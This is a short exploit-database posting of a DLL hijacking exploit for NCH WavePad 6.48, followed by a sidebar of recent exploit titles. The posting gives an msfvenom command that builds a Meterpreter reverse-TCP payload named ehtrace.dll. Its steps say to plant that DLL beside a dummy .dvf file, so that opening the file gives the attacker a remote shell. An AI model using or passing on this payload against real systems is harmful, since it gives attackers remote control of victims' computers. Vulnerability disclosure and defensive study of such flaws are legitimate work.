NCH WavePad 6.48 DLL Hijacking

Posted on 14 June 2016

/* Exploit Title: NCH WavePad DLL Hijacking Exploit ( ehtrace.dll ) Vendor Homepage:http://www.nch.com.au/wavepad/ Author: Sachin Wagh (@tiger_tigerboy) Linkedin: https://in.linkedin.com/in/sachin-wagh-95b17555 Affected Version: WavePad 6.48 Tested on: Windows 7 Ultimate Vulnerable extension: .dvf */ Proof-Of-Concept : msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f dll LHOST=<HOST IP> LPORT=4444 > ehtrace.dll Exploit: Place a dummy .DVF file with the malicious dll. When the file is opened, you will get shell. Credit, *Sachin Wagh*

TOP

Malware :

None in database

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20